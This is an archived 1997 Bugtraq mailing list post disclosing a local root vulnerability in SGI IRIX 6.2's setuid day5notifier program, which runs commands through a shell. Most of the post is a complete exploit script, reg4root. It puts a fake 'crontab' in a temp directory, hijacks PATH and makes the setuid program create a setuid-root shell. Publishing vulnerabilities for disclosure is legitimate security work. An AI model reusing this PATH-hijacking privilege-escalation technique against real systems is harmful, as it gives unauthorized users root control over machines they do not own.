Bugtraq mailing list archives
Day5notifier (IRIX 6.2 vulnerability)
From: mcn () RIPOSTE ENGARDE COM (Mike Neuman)
Date: Fri, 16 May 1997 11:25:35 -0600
This message was sent nearly a year ago to SGI, and their customer support people still claim to have never heard of it. It only works on 6.2 (as far as I know), but 6.2 is still the only OS available for Indy's. It also points out a flaw in quite a few other SGI programs. Apparently an engineer read the "How not to use the system() call", and made up his own alternative. :-) ===== To: security-alert () sgi com Subject: Vulnerability in IRIX 6.2 Date: Tue, 06 Aug 1996 18:29:38 -0600 Hello! This afternoon I decided to take a close look at some of the setuid exectuables running on my IRIX 6.2 system. An hour later, I have at least one major problem to report. :-) I've enclosed the exploit script below, which contains a lengthy explanation at the top of the vulnerability and why it exists. If you have any questions, please feel free to contact me! -Mike Neuman mcn () EnGarde com ----- #!/bin/sh # reg4root - Register me for Root! # # Exploit a bug in SGI's Registration Software # # -Mike Neuman # mcn () EnGarde com # 8/6/96 # # The bug is contained within the /var/www/htdocs/WhatsNew/CustReg/day5notifier # program, apparently installed by default under IRIX 6.2. It may appear in # the other setuid root program (day5datacopier) there, but I haven't had the # time to check. # # SGI is apparently trying to do the right thing (by using execv() instead of # system(), but apparently some engineer decided that execv() was too limited # in capabilities, so he/she translated system() to: # # execve("/sbin/sh", "sh", "-c", "command...") # # This completely eliminates any security benefits execv() had! # # The program probably should not be setuid root. There are at least another # dozen potential security vulnerabilities (ie. _RLD_* variables, race # conditions, etc) found just by looking at strings. # # Note crontab and ps are only two of the problems. There are probably others. MYPWD=`pwd` mkdir /tmp/emptydir.$$ cd /tmp/emptydir.$$ cat <<EOF >crontab cp /bin/sh ./suidshell chmod 4755 suidshell EOF chmod +x crontab PATH=.:$PATH export PATH /var/www/htdocs/WhatsNew/CustReg/day5notifier -procs 0 ./suidshell cd $MYPWD rm -rf /tmp/emptydir.$$
Current thread:
- Day5notifier (IRIX 6.2 vulnerability) Mike Neuman (May 16)